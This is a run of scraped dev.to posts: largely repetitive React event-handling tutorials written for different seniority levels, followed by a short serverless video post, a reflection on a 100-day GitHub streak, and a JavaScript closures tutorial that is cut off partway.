Handling events in React is essential for creating interactive applications. By understanding how to add event handlers, use synthetic events, pass arguments to event handlers, create custom events, and leverage event delegation, you can build more dynamic and efficient React applications. As you gain experience, these techniques will become second nature, allowing you to create complex interactions with ease. | __zamora__ |
1,917,796 | Junior level: Handling Events in React | Handling events in React is a fundamental skill that allows you to create interactive and dynamic... | 0 | 2024-07-09T20:23:54 | https://dev.to/__zamora__/junior-level-handling-events-in-react-1bob | react, webdev, javascript, programming | Handling events in React is a fundamental skill that allows you to create interactive and dynamic applications. This guide will walk you through the basics of event handling in React, including adding event handlers, understanding synthetic events, passing arguments to event handlers, creating custom events, and using event delegation.
## Event Handling
### Adding Event Handlers in JSX
In React, you can add event handlers directly in your JSX. Event handlers are functions that are called when a specific event occurs, such as a button click or a form submission.
Example of adding an event handler:
```jsx
import React from 'react';
const handleClick = () => {
alert('Button clicked!');
};
const App = () => {
return (
<div>
<button onClick={handleClick}>Click Me</button>
</div>
);
};
export default App;
```
In this example, the `handleClick` function is called whenever the button is clicked. The `onClick` attribute in JSX is used to specify the event handler.
### Synthetic Events
React uses a system called synthetic events to handle events. Synthetic events are a cross-browser wrapper around the browser's native event system. This ensures that events behave consistently across different browsers.
Example of a synthetic event:
```jsx
import React from 'react';
const handleInputChange = (event) => {
console.log('Input value:', event.target.value);
};
const App = () => {
return (
<div>
<input type="text" onChange={handleInputChange} />
</div>
);
};
export default App;
```
In this example, the `handleInputChange` function logs the value of the input field whenever it changes. The `event` parameter is a synthetic event that provides consistent event properties across all browsers.
### Passing Arguments to Event Handlers
Sometimes, you need to pass additional arguments to event handlers. This can be done using an arrow function or the `bind` method.
Example using an arrow function:
```jsx
import React from 'react';
const handleClick = (message) => {
alert(message);
};
const App = () => {
return (
<div>
<button onClick={() => handleClick('Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Example using the `bind` method:
```jsx
import React from 'react';
const handleClick = (message) => {
alert(message);
};
const App = () => {
return (
<div>
<button onClick={handleClick.bind(null, 'Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Both methods allow you to pass additional arguments to the `handleClick` function.
## Custom Event Handling
### Creating Custom Events
While React's synthetic events cover most of the typical use cases, you might need to create custom events for more complex interactions. Custom events can be created and dispatched using the `CustomEvent` constructor and the `dispatchEvent` method.
Example of creating and dispatching a custom event:
```jsx
import React, { useEffect, useRef } from 'react';
const CustomEventComponent = () => {
const buttonRef = useRef(null);
useEffect(() => {
const handleCustomEvent = (event) => {
alert(event.detail.message);
};
const button = buttonRef.current;
button.addEventListener('customEvent', handleCustomEvent);
return () => {
button.removeEventListener('customEvent', handleCustomEvent);
};
}, []);
const handleClick = () => {
const customEvent = new CustomEvent('customEvent', {
detail: { message: 'Custom event triggered!' },
});
buttonRef.current.dispatchEvent(customEvent);
};
return (
<button ref={buttonRef} onClick={handleClick}>
Trigger Custom Event
</button>
);
};
export default CustomEventComponent;
```
In this example, a custom event named `customEvent` is created and dispatched when the button is clicked. The event handler listens for the custom event and displays an alert with the event's detail message.
### Event Delegation in React
Event delegation is a technique where a single event listener is used to manage events for multiple elements. This is useful for managing events efficiently, especially in lists or tables.
Example of event delegation:
```jsx
import React from 'react';
const handleClick = (event) => {
if (event.target.tagName === 'BUTTON') {
alert(`Button ${event.target.textContent} clicked!`);
}
};
const App = () => {
return (
<div onClick={handleClick}>
<button>1</button>
<button>2</button>
<button>3</button>
</div>
);
};
export default App;
```
In this example, a single event handler on the `div` element manages click events for all the buttons. The event handler checks the `event.target` to determine which button was clicked and displays an alert accordingly.
## Conclusion
Handling events in React is essential for creating interactive applications. By understanding how to add event handlers, use synthetic events, pass arguments to event handlers, create custom events, and leverage event delegation, you can build more dynamic and efficient React applications. As you gain experience, these techniques will become second nature, allowing you to create complex interactions with ease. | __zamora__ |
1,917,797 | Mid level: Handling Events in React | As a mid-level developer, you should have a solid understanding of handling events in React, which is... | 0 | 2024-07-09T20:24:41 | https://dev.to/__zamora__/mid-level-handling-events-in-react-j2e | react, webdev, javascript, programming | As a mid-level developer, you should have a solid understanding of handling events in React, which is essential for creating interactive and dynamic applications. This guide will cover advanced concepts and best practices, including adding event handlers, understanding synthetic events, passing arguments to event handlers, creating custom events, and leveraging event delegation.
## Event Handling
### Adding Event Handlers in JSX
In React, event handlers can be added directly in JSX. Event handlers are functions that are called when a specific event occurs, such as a button click or a form submission. Adding event handlers in JSX is similar to how it's done in regular HTML but with React's JSX syntax.
Example of adding an event handler:
```jsx
import React from 'react';
const handleClick = () => {
alert('Button clicked!');
};
const App = () => {
return (
<div>
<button onClick={handleClick}>Click Me</button>
</div>
);
};
export default App;
```
In this example, the `handleClick` function is called whenever the button is clicked. The `onClick` attribute in JSX is used to specify the event handler.
### Synthetic Events
React uses a system called synthetic events to handle events. Synthetic events are a cross-browser wrapper around the browser's native event system. This ensures that events behave consistently across different browsers.
Example of a synthetic event:
```jsx
import React from 'react';
const handleInputChange = (event) => {
console.log('Input value:', event.target.value);
};
const App = () => {
return (
<div>
<input type="text" onChange={handleInputChange} />
</div>
);
};
export default App;
```
In this example, the `handleInputChange` function logs the value of the input field whenever it changes. The `event` parameter is a synthetic event that provides consistent event properties across all browsers.
### Passing Arguments to Event Handlers
Sometimes, you need to pass additional arguments to event handlers. This can be done using an arrow function or the `bind` method.
Example using an arrow function:
```jsx
import React from 'react';
const handleClick = (message) => {
alert(message);
};
const App = () => {
return (
<div>
<button onClick={() => handleClick('Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Example using the `bind` method:
```jsx
import React from 'react';
const handleClick = (message) => {
alert(message);
};
const App = () => {
return (
<div>
<button onClick={handleClick.bind(null, 'Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Both methods allow you to pass additional arguments to the `handleClick` function.
## Custom Event Handling
### Creating Custom Events
While React's synthetic events cover most of the typical use cases, you might need to create custom events for more complex interactions. Custom events can be created and dispatched using the `CustomEvent` constructor and the `dispatchEvent` method.
Example of creating and dispatching a custom event:
```jsx
import React, { useEffect, useRef } from 'react';
const CustomEventComponent = () => {
const buttonRef = useRef(null);
useEffect(() => {
const handleCustomEvent = (event) => {
alert(event.detail.message);
};
const button = buttonRef.current;
button.addEventListener('customEvent', handleCustomEvent);
return () => {
button.removeEventListener('customEvent', handleCustomEvent);
};
}, []);
const handleClick = () => {
const customEvent = new CustomEvent('customEvent', {
detail: { message: 'Custom event triggered!' },
});
buttonRef.current.dispatchEvent(customEvent);
};
return (
<button ref={buttonRef} onClick={handleClick}>
Trigger Custom Event
</button>
);
};
export default CustomEventComponent;
```
In this example, a custom event named `customEvent` is created and dispatched when the button is clicked. The event handler listens for the custom event and displays an alert with the event's detail message.
### Event Delegation in React
Event delegation is a technique where a single event listener is used to manage events for multiple elements. This is useful for managing events efficiently, especially in lists or tables.
Example of event delegation:
```jsx
import React from 'react';
const handleClick = (event) => {
if (event.target.tagName === 'BUTTON') {
alert(`Button ${event.target.textContent} clicked!`);
}
};
const App = () => {
return (
<div onClick={handleClick}>
<button>1</button>
<button>2</button>
<button>3</button>
</div>
);
};
export default App;
```
In this example, a single event handler on the `div` element manages click events for all the buttons. The event handler checks the `event.target` to determine which button was clicked and displays an alert accordingly.
## Best Practices for Event Handling in React
1. **Use Event Handlers Wisely:** Avoid creating new event handler functions inside render methods, as it can lead to performance issues. Instead, define your event handlers outside the render method.
2. **Prevent Default Behavior:** Use `event.preventDefault()` to prevent the default behavior of events when necessary, such as form submissions or anchor tag clicks.
```jsx
const handleSubmit = (event) => {
event.preventDefault();
// Handle form submission
};
return <form onSubmit={handleSubmit}>...</form>;
```
3. **Stop Propagation:** Use `event.stopPropagation()` to stop the propagation of events to parent elements when needed.
```jsx
const handleButtonClick = (event) => {
event.stopPropagation();
// Handle button click
};
return <button onClick={handleButtonClick}>Click Me</button>;
```
4. **Debouncing and Throttling:** Use debouncing or throttling techniques to limit the number of times an event handler is called for high-frequency events like scrolling or resizing.
5. **Clean Up Event Listeners:** When adding event listeners directly to DOM elements (especially in class components or hooks), ensure to clean them up to avoid memory leaks.
```jsx
useEffect(() => {
const handleResize = () => {
// Handle resize
};
window.addEventListener('resize', handleResize);
return () => {
window.removeEventListener('resize', handleResize);
};
}, []);
```
## Conclusion
Handling events in React is essential for creating interactive applications. By understanding how to add event handlers, use synthetic events, pass arguments to event handlers, create custom events, and leverage event delegation, you can build more dynamic and efficient React applications. Implementing best practices ensures your applications remain performant and maintainable as they grow in complexity. As a mid-level developer, mastering these techniques will enhance your ability to handle complex interactions and contribute to the success of your projects. | __zamora__ |
1,917,798 | Senior level: Handling Events in React | As a senior developer, you are expected to have a deep understanding of event handling in React. This... | 0 | 2024-07-09T20:25:48 | https://dev.to/__zamora__/senior-level-handling-events-in-react-9h8 | react, webdev, javascript, programming | As a senior developer, you are expected to have a deep understanding of event handling in React. This involves not only knowing the basics but also mastering advanced techniques to create efficient, maintainable, and scalable applications. This article covers the intricacies of event handling in React, including adding event handlers, understanding synthetic events, passing arguments to event handlers, creating custom events, and leveraging event delegation.
## Event Handling
### Adding Event Handlers in JSX
Adding event handlers in JSX is straightforward and similar to handling events in regular HTML, but with some key differences due to React's unique architecture.
Example of adding an event handler:
```jsx
import React from 'react';
const handleClick = () => {
console.log('Button clicked!');
};
const App = () => {
return (
<div>
<button onClick={handleClick}>Click Me</button>
</div>
);
};
export default App;
```
In this example, the `handleClick` function is called whenever the button is clicked. The `onClick` attribute in JSX is used to specify the event handler.
### Synthetic Events
React uses a system called synthetic events to handle events. Synthetic events are a cross-browser wrapper around the browser's native event system. This ensures that events behave consistently across different browsers, providing a unified API.
Example of a synthetic event:
```jsx
import React from 'react';
const handleInputChange = (event) => {
console.log('Input value:', event.target.value);
};
const App = () => {
return (
<div>
<input type="text" onChange={handleInputChange} />
</div>
);
};
export default App;
```
In this example, the `handleInputChange` function logs the value of the input field whenever it changes. The `event` parameter is a synthetic event that provides consistent event properties across all browsers.
### Passing Arguments to Event Handlers
Passing arguments to event handlers can be done using an arrow function or the `bind` method, which is crucial for handling events in a more flexible way.
Example using an arrow function:
```jsx
import React from 'react';
const handleClick = (message) => {
console.log(message);
};
const App = () => {
return (
<div>
<button onClick={() => handleClick('Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Example using the `bind` method:
```jsx
import React from 'react';
const handleClick = (message) => {
console.log(message);
};
const App = () => {
return (
<div>
<button onClick={handleClick.bind(null, 'Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Both methods allow you to pass additional arguments to the `handleClick` function, providing flexibility in event handling.
## Custom Event Handling
### Creating Custom Events
Creating custom events in React is necessary for more complex interactions that aren't covered by standard events. Custom events can be created and dispatched using the `CustomEvent` constructor and the `dispatchEvent` method.
Example of creating and dispatching a custom event:
```jsx
import React, { useEffect, useRef } from 'react';
const CustomEventComponent = () => {
const buttonRef = useRef(null);
useEffect(() => {
const handleCustomEvent = (event) => {
console.log(event.detail.message);
};
const button = buttonRef.current;
button.addEventListener('customEvent', handleCustomEvent);
return () => {
button.removeEventListener('customEvent', handleCustomEvent);
};
}, []);
const handleClick = () => {
const customEvent = new CustomEvent('customEvent', {
detail: { message: 'Custom event triggered!' },
});
buttonRef.current.dispatchEvent(customEvent);
};
return (
<button ref={buttonRef} onClick={handleClick}>
Trigger Custom Event
</button>
);
};
export default CustomEventComponent;
```
In this example, a custom event named `customEvent` is created and dispatched when the button is clicked. The event handler listens for the custom event and logs the event's detail message.
### Event Delegation in React
Event delegation is a technique where a single event listener is used to manage events for multiple elements. This is especially useful for managing events efficiently in lists or tables.
Example of event delegation:
```jsx
import React from 'react';
const handleClick = (event) => {
if (event.target.tagName === 'BUTTON') {
console.log(`Button ${event.target.textContent} clicked!`);
}
};
const App = () => {
return (
<div onClick={handleClick}>
<button>1</button>
<button>2</button>
<button>3</button>
</div>
);
};
export default App;
```
In this example, a single event handler on the `div` element manages click events for all the buttons. The event handler checks the `event.target` to determine which button was clicked and logs a message accordingly.
## Best Practices for Event Handling in React
1. **Avoid Creating Inline Functions in JSX:** Creating new functions inside the render method can lead to unnecessary re-renders and performance issues. Instead, define event handlers as class methods or use hooks.
```jsx
const App = () => {
const handleClick = () => {
console.log('Button clicked!');
};
return (
<div>
<button onClick={handleClick}>Click Me</button>
</div>
);
};
```
2. **Prevent Default Behavior and Stop Propagation:** Use `event.preventDefault()` to prevent default behavior and `event.stopPropagation()` to stop event propagation when necessary.
```jsx
const handleSubmit = (event) => {
event.preventDefault();
// Handle form submission
};
return <form onSubmit={handleSubmit}>...</form>;
```
3. **Clean Up Event Listeners:** When adding event listeners directly to DOM elements, ensure to clean them up to avoid memory leaks.
```jsx
useEffect(() => {
const handleResize = () => {
console.log('Window resized');
};
window.addEventListener('resize', handleResize);
return () => {
window.removeEventListener('resize', handleResize);
};
}, []);
```
4. **Debounce or Throttle High-Frequency Events:** Use debounce or throttle techniques for high-frequency events like scrolling or resizing to improve performance.
```jsx
const debounce = (func, delay) => {
let timeoutId;
return (...args) => {
clearTimeout(timeoutId);
timeoutId = setTimeout(() => {
func.apply(null, args);
}, delay);
};
};
useEffect(() => {
const handleScroll = debounce(() => {
console.log('Scroll event');
}, 300);
window.addEventListener('scroll', handleScroll);
return () => {
window.removeEventListener('scroll', handleScroll);
};
}, []);
```
5. **Use Event Delegation Wisely:** Leverage event delegation for elements that are dynamically added or removed to the DOM, such as lists of items.
```jsx
const List = () => {
const handleClick = (event) => {
if (event.target.tagName === 'LI') {
console.log(`Item ${event.target.textContent} clicked!`);
}
};
return (
<ul onClick={handleClick}>
<li>Item 1</li>
<li>Item 2</li>
<li>Item 3</li>
</ul>
);
};
```
## Conclusion
Handling events in React efficiently is crucial for creating interactive and high-performance applications. By mastering the techniques of adding event handlers, using synthetic events, passing arguments to event handlers, creating custom events, and leveraging event delegation, you can build robust and scalable applications. Implementing best practices ensures that your code remains maintainable and performant as it grows in complexity. As a senior developer, your ability to utilize these advanced techniques will significantly contribute to the success of your projects and the effectiveness of your team. | __zamora__ |
1,917,799 | Lead level: Handling Events in React | As a lead developer, it’s crucial to master the advanced concepts of event handling in React to... | 0 | 2024-07-09T20:26:26 | https://dev.to/__zamora__/lead-level-handling-events-in-react-406 | react, webdev, javascript, programming | As a lead developer, it’s crucial to master the advanced concepts of event handling in React to ensure your applications are efficient, maintainable, and scalable. This article will cover sophisticated techniques and best practices for handling events in React, including adding event handlers, understanding synthetic events, passing arguments to event handlers, creating custom events, and leveraging event delegation.
## Event Handling
### Adding Event Handlers in JSX
Adding event handlers in JSX is a straightforward process that is fundamental to creating interactive React applications. Event handlers in JSX are similar to those in HTML but with React's JSX syntax and specific considerations for performance and readability.
Example of adding an event handler:
```jsx
import React from 'react';
const handleClick = () => {
console.log('Button clicked!');
};
const App = () => {
return (
<div>
<button onClick={handleClick}>Click Me</button>
</div>
);
};
export default App;
```
In this example, the `handleClick` function is triggered whenever the button is clicked. The `onClick` attribute in JSX is used to specify the event handler.
### Synthetic Events
React uses synthetic events to ensure that events behave consistently across different browsers. Synthetic events are a cross-browser wrapper around the browser's native event system, providing a unified API for handling events in React.
Example of a synthetic event:
```jsx
import React from 'react';
const handleInputChange = (event) => {
console.log('Input value:', event.target.value);
};
const App = () => {
return (
<div>
<input type="text" onChange={handleInputChange} />
</div>
);
};
export default App;
```
In this example, the `handleInputChange` function logs the value of the input field whenever it changes. The `event` parameter is a synthetic event that provides consistent event properties across all browsers.
### Passing Arguments to Event Handlers
To pass additional arguments to event handlers, you can use an arrow function or the `bind` method. This technique is essential for handling dynamic data and interactions in a flexible manner.
Example using an arrow function:
```jsx
import React from 'react';
const handleClick = (message) => {
console.log(message);
};
const App = () => {
return (
<div>
<button onClick={() => handleClick('Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Example using the `bind` method:
```jsx
import React from 'react';
const handleClick = (message) => {
console.log(message);
};
const App = () => {
return (
<div>
<button onClick={handleClick.bind(null, 'Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Both methods allow you to pass additional arguments to the `handleClick` function, providing flexibility in handling events.
## Custom Event Handling
### Creating Custom Events
Creating custom events can be necessary for more complex interactions that go beyond standard events. Custom events can be created and dispatched using the `CustomEvent` constructor and the `dispatchEvent` method.
Example of creating and dispatching a custom event:
```jsx
import React, { useEffect, useRef } from 'react';
const CustomEventComponent = () => {
const buttonRef = useRef(null);
useEffect(() => {
const handleCustomEvent = (event) => {
console.log(event.detail.message);
};
const button = buttonRef.current;
button.addEventListener('customEvent', handleCustomEvent);
return () => {
button.removeEventListener('customEvent', handleCustomEvent);
};
}, []);
const handleClick = () => {
const customEvent = new CustomEvent('customEvent', {
detail: { message: 'Custom event triggered!' },
});
buttonRef.current.dispatchEvent(customEvent);
};
return (
<button ref={buttonRef} onClick={handleClick}>
Trigger Custom Event
</button>
);
};
export default CustomEventComponent;
```
In this example, a custom event named `customEvent` is created and dispatched when the button is clicked. The event handler listens for the custom event and logs the event's detail message.
### Event Delegation in React
Event delegation is a technique where a single event listener is used to manage events for multiple elements. This is especially useful for managing events efficiently in dynamic lists or tables, as it reduces the number of event listeners required.
Example of event delegation:
```jsx
import React from 'react';
const handleClick = (event) => {
if (event.target.tagName === 'BUTTON') {
console.log(`Button ${event.target.textContent} clicked!`);
}
};
const App = () => {
return (
<div onClick={handleClick}>
<button>1</button>
<button>2</button>
<button>3</button>
</div>
);
};
export default App;
```
In this example, a single event handler on the `div` element manages click events for all the buttons. The event handler checks the `event.target` to determine which button was clicked and logs a message accordingly.
## Best Practices for Event Handling in React
1. **Avoid Creating Inline Functions in JSX:** Creating new functions inside the render method can lead to unnecessary re-renders and performance issues. Define event handlers outside the render method or use hooks.
```jsx
const App = () => {
const handleClick = () => {
console.log('Button clicked!');
};
return (
<div>
<button onClick={handleClick}>Click Me</button>
</div>
);
};
```
2. **Prevent Default Behavior and Stop Propagation:** Use `event.preventDefault()` to prevent default behavior and `event.stopPropagation()` to stop event propagation when necessary.
```jsx
const handleSubmit = (event) => {
event.preventDefault();
// Handle form submission
};
return <form onSubmit={handleSubmit}>...</form>;
```
3. **Clean Up Event Listeners:** When adding event listeners directly to DOM elements, ensure to clean them up to avoid memory leaks.
```jsx
useEffect(() => {
const handleResize = () => {
console.log('Window resized');
};
window.addEventListener('resize', handleResize);
return () => {
window.removeEventListener('resize', handleResize);
};
}, []);
```
4. **Debounce or Throttle High-Frequency Events:** Use debounce or throttle techniques for high-frequency events like scrolling or resizing to improve performance.
```jsx
const debounce = (func, delay) => {
let timeoutId;
return (...args) => {
clearTimeout(timeoutId);
timeoutId = setTimeout(() => {
func.apply(null, args);
}, delay);
};
};
useEffect(() => {
const handleScroll = debounce(() => {
console.log('Scroll event');
}, 300);
window.addEventListener('scroll', handleScroll);
return () => {
window.removeEventListener('scroll', handleScroll);
};
}, []);
```
5. **Use Event Delegation Wisely:** Leverage event delegation for elements that are dynamically added or removed to the DOM, such as lists of items.
```jsx
const List = () => {
const handleClick = (event) => {
if (event.target.tagName === 'LI') {
console.log(`Item ${event.target.textContent} clicked!`);
}
};
return (
<ul onClick={handleClick}>
<li>Item 1</li>
<li>Item 2</li>
<li>Item 3</li>
</ul>
);
};
```
## Conclusion
Handling events in React efficiently is crucial for creating interactive and high-performance applications. By mastering the techniques of adding event handlers, using synthetic events, passing arguments to event handlers, creating custom events, and leveraging event delegation, you can build robust and scalable applications. Implementing best practices ensures that your code remains maintainable and performant as it grows in complexity. As a lead developer, your ability to utilize these advanced techniques will significantly contribute to the success of your projects and the effectiveness of your team. | __zamora__ |
1,917,800 | Architect level: Handling Events in React | As an architect-level developer, your focus should be on designing scalable, maintainable, and... | 0 | 2024-07-09T20:27:08 | https://dev.to/__zamora__/architect-level-handling-events-in-react-31ho | react, webdev, javascript, programming | As an architect-level developer, your focus should be on designing scalable, maintainable, and performant applications. Handling events efficiently in React is a crucial part of this. This article delves into advanced concepts and best practices for event handling in React, including adding event handlers, understanding synthetic events, passing arguments to event handlers, creating custom events, and leveraging event delegation.
## Event Handling
### Adding Event Handlers in JSX
Adding event handlers in JSX is the foundation of creating interactive applications. Event handlers in JSX are similar to those in HTML but tailored to React's architecture and performance considerations.
Example of adding an event handler:
```jsx
import React from 'react';
const handleClick = () => {
console.log('Button clicked!');
};
const App = () => {
return (
<div>
<button onClick={handleClick}>Click Me</button>
</div>
);
};
export default App;
```
In this example, the `handleClick` function is called whenever the button is clicked. The `onClick` attribute in JSX specifies the event handler.
### Synthetic Events
React uses synthetic events to ensure consistent behavior across different browsers. Synthetic events are a cross-browser wrapper around the browser's native event system, providing a unified API.
Example of a synthetic event:
```jsx
import React from 'react';
const handleInputChange = (event) => {
console.log('Input value:', event.target.value);
};
const App = () => {
return (
<div>
<input type="text" onChange={handleInputChange} />
</div>
);
};
export default App;
```
In this example, the `handleInputChange` function logs the value of the input field whenever it changes. The `event` parameter is a synthetic event that provides consistent event properties across all browsers.
### Passing Arguments to Event Handlers
Passing arguments to event handlers can be achieved using arrow functions or the `bind` method. This technique is essential for handling events in a flexible manner.
Example using an arrow function:
```jsx
import React from 'react';
const handleClick = (message) => {
console.log(message);
};
const App = () => {
return (
<div>
<button onClick={() => handleClick('Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Example using the `bind` method:
```jsx
import React from 'react';
const handleClick = (message) => {
console.log(message);
};
const App = () => {
return (
<div>
<button onClick={handleClick.bind(null, 'Button clicked!')}>Click Me</button>
</div>
);
};
export default App;
```
Both methods allow you to pass additional arguments to the `handleClick` function, providing flexibility in event handling.
## Custom Event Handling
### Creating Custom Events
Creating custom events can be necessary for complex interactions that go beyond standard events. Custom events can be created and dispatched using the `CustomEvent` constructor and the `dispatchEvent` method.
Example of creating and dispatching a custom event:
```jsx
import React, { useEffect, useRef } from 'react';
const CustomEventComponent = () => {
const buttonRef = useRef(null);
useEffect(() => {
const handleCustomEvent = (event) => {
console.log(event.detail.message);
};
const button = buttonRef.current;
button.addEventListener('customEvent', handleCustomEvent);
return () => {
button.removeEventListener('customEvent', handleCustomEvent);
};
}, []);
const handleClick = () => {
const customEvent = new CustomEvent('customEvent', {
detail: { message: 'Custom event triggered!' },
});
buttonRef.current.dispatchEvent(customEvent);
};
return (
<button ref={buttonRef} onClick={handleClick}>
Trigger Custom Event
</button>
);
};
export default CustomEventComponent;
```
In this example, a custom event named `customEvent` is created and dispatched when the button is clicked. The event handler listens for the custom event and logs the event's detail message.
### Event Delegation in React
Event delegation is a technique where a single event listener is used to manage events for multiple elements. This is especially useful for managing events efficiently in dynamic lists or tables, as it reduces the number of event listeners required.
Example of event delegation:
```jsx
import React from 'react';
const handleClick = (event) => {
if (event.target.tagName === 'BUTTON') {
console.log(`Button ${event.target.textContent} clicked!`);
}
};
const App = () => {
return (
<div onClick={handleClick}>
<button>1</button>
<button>2</button>
<button>3</button>
</div>
);
};
export default App;
```
In this example, a single event handler on the `div` element manages click events for all the buttons. The event handler checks the `event.target` to determine which button was clicked and logs a message accordingly.
## Best Practices for Event Handling in React
1. **Avoid Creating Inline Functions in JSX:** Creating new functions inside the render method can lead to unnecessary re-renders and performance issues. Define event handlers outside the render method or use hooks.
```jsx
const App = () => {
const handleClick = () => {
console.log('Button clicked!');
};
return (
<div>
<button onClick={handleClick}>Click Me</button>
</div>
);
};
```
2. **Prevent Default Behavior and Stop Propagation:** Use `event.preventDefault()` to prevent default behavior and `event.stopPropagation()` to stop event propagation when necessary.
```jsx
const handleSubmit = (event) => {
event.preventDefault();
// Handle form submission
};
return <form onSubmit={handleSubmit}>...</form>;
```
3. **Clean Up Event Listeners:** When adding event listeners directly to DOM elements, ensure to clean them up to avoid memory leaks.
```jsx
useEffect(() => {
const handleResize = () => {
console.log('Window resized');
};
window.addEventListener('resize', handleResize);
return () => {
window.removeEventListener('resize', handleResize);
};
}, []);
```
4. **Debounce or Throttle High-Frequency Events:** Use debounce or throttle techniques for high-frequency events like scrolling or resizing to improve performance.
```jsx
const debounce = (func, delay) => {
let timeoutId;
return (...args) => {
clearTimeout(timeoutId);
timeoutId = setTimeout(() => {
func.apply(null, args);
}, delay);
};
};
useEffect(() => {
const handleScroll = debounce(() => {
console.log('Scroll event');
}, 300);
window.addEventListener('scroll', handleScroll);
return () => {
window.removeEventListener('scroll', handleScroll);
};
}, []);
```
5. **Use Event Delegation Wisely:** Leverage event delegation for elements that are dynamically added or removed to the DOM, such as lists of items.
```jsx
const List = () => {
const handleClick = (event) => {
if (event.target.tagName === 'LI') {
console.log(`Item ${event.target.textContent} clicked!`);
}
};
return (
<ul onClick={handleClick}>
<li>Item 1</li>
<li>Item 2</li>
<li>Item 3</li>
</ul>
);
};
```
## Conclusion
Handling events in React efficiently is crucial for creating interactive and high-performance applications. By mastering the techniques of adding event handlers, using synthetic events, passing arguments to event handlers, creating custom events, and leveraging event delegation, you can build robust and scalable applications. Implementing best practices ensures that your code remains maintainable and performant as it grows in complexity. As an architect-level developer, your ability to utilize these advanced techniques will significantly contribute to the success of your projects and the effectiveness of your team. | __zamora__ |
1,917,801 | Would you happen to know about Serverless Computing? | In this video, I talked about what serverless is, why this is so cool, and how this is used in... | 0 | 2024-07-09T20:35:04 | https://dev.to/aws-builders/would-you-happen-to-know-about-serverless-computing-3cl7 | serverless, lambda, cloudoperations, cloudpractitioner | In this video, I talked about what serverless is, why this is so cool, and how this is used in practice!
I hope you can enjoy the video. If you have any points to share, please, feel free to comment here =).
The AWS level of content is between 100-200. Please don't forget about serverless. | carlosfilho |
1,917,802 | Celebrating 100 Days of Continuous GitHub Contributions | Reflecting on the journey, challenges, and achievements of maintaining a 100-day GitHub streak. | 0 | 2024-07-09T20:38:59 | https://dev.to/fmcalisto/celebrating-100-days-of-continuous-github-contributions-7h8 | github, opensource, productivity, developer | ---
title: Celebrating 100 Days of Continuous GitHub Contributions
published: true
description: Reflecting on the journey, challenges, and achievements of maintaining a 100-day GitHub streak.
tags: github, opensource, productivity, developer
cover_image: https://github.com/FMCalisto/FMCalisto/blob/main/assets/b30cc86cd6ce4ef0_2.png?raw=true
---

Hey everyone!
I’m excited to share that I’ve just hit 100 days of continuous contributions from [my GitHub profile](https://github.com/FMCalisto) ([@FMCalisto](https://github.com/FMCalisto)). It’s been an incredible journey, filled with learning, challenges, and a lot of coding. I wanted to take a moment to reflect on this milestone and share some insights with you all.
### How It All Started
This streak began on April 1st. No, it wasn’t an April Fool’s joke! I decided to push myself to contribute to GitHub every single day. Initially, it was a way to sharpen my skills and stay disciplined, but it quickly became much more than that. It turned into a daily ritual that I looked forward to, a way to engage with the community, and a personal challenge to see how far I could go.
### My Daily Routine
To keep the streak alive, I developed a daily routine:
- **Morning Planning**: I’d kick off each day with a quick planning session to decide what I’d work on.
- **Consistent Coding**: Whether it was a busy workday or the weekend, I dedicated at least an hour to coding.
- **Leveraging Tools**: Tools like VS Code and GitHub Desktop were my best friends, helping streamline my workflow.
- **Taking Breaks**: To avoid burnout, I made sure to step away from the screen and take breaks.
### Highlights of My Contributions
Over these 100 days, I had the chance to work on a variety of initiatives:
- **[MIMBCD-UI](https://github.com/MIMBCD-UI)**: Added some cool new tools for medical imaging data curation in Machine Learning (ML) projects.
- **[MIDA](https://github.com/mida-project)**: Published the LaTeX source of my PhD Thesis and some other research documents.
### The Challenges
It wasn’t always smooth sailing:
- **Time Management**: Balancing my contributions with other responsibilities was tough. Prioritizing and managing my time effectively was key.
- **Staying Motivated**: There were days when it was hard to stay motivated. Focusing on the impact of my work and the support from the community kept me going.
- **Avoiding Burnout**: Ensuring I took breaks and practiced self-care helped me maintain my energy and enthusiasm.
### Lessons Learned
This journey taught me a lot:
- **Consistency Pays Off**: Small, daily efforts can lead to big achievements.
- **Community is Everything**: The support and feedback from the developer community are invaluable.
- **Never Stop Learning**: Every contribution is an opportunity to learn and grow.
### Looking Ahead
So, what’s next?
- **New Initiatives**: I’m planning to start some new open-source projects and would love for you to join me.
- **Sharing Knowledge**: I’ll keep writing posts and tutorials to share what I’ve learned.
- **Making an Impact**: I aim to contribute to projects that can make a real difference in the community.
### Wrapping Up
Hitting 100 days of continuous contributions is something I’m really proud of. It’s been a journey of growth, learning, and connecting with others. I hope my experience inspires you to start your own streak or just keep contributing in your own way.
Thanks for reading and being part of this journey. Let’s keep coding and making awesome things together!
---
Feel free to drop your questions and thoughts in the comments below. I’d love to hear about your experiences and any tips you have for maintaining a contribution streak.
| fmcalisto |
1,917,803 | Let's Understand JavaScript Closures: A Fundamental Concept | Closures are a powerful feature in JavaScript that allow functions to retain access to their lexical... | 0 | 2024-07-09T20:39:36 | https://dev.to/readwanmd/lets-understand-javascript-closures-a-fundamental-concept-1c54 | javascript, closures | Closures are a powerful feature in JavaScript that allow functions to retain access to their lexical scope, even when the function is executed outside that scope. This can sound abstract, but with some simple examples, you'll see how closures can be both intuitive and incredibly useful in real-world applications.
## What is a Closure?
A closure is created whenever a function is created - every function has an associated closure.
When a function is defined within another function, and the inner function retains access to the outer function’s variables. Essentially, a closure gives you access to an outer function’s scope from an inner function.
Here’s a simple definition:
- **Closure**: A combination of a function and its lexical environment within which that function was declared.
## Basic Example
Let’s start with a basic example to illustrate the concept of closures:
```javascript
function outerFunction() {
let outerVariable = 'I am from the outer function';
function innerFunction() {
console.log(outerVariable);
}
return innerFunction;
}
const myClosure = outerFunction();
myClosure(); // Outputs: I am from the outer function
```
In this example:
- `outerFunction` contains a variable `outerVariable` and an inner function `innerFunction`.
- `innerFunction` accesses `outerVariable` and logs it to the console.
- `outerFunction` returns `innerFunction`, and we store it in `myClosure`.
- When `myClosure` is called, it still has access to `outerVariable` even though `outerFunction` has finished executing. This is a closure in action.
## Real-World Example: Creating Private Variables
Closures are often used to create private variables in JavaScript. Here’s an example of how you can use closures to encapsulate data and provide a controlled interface to interact with it:
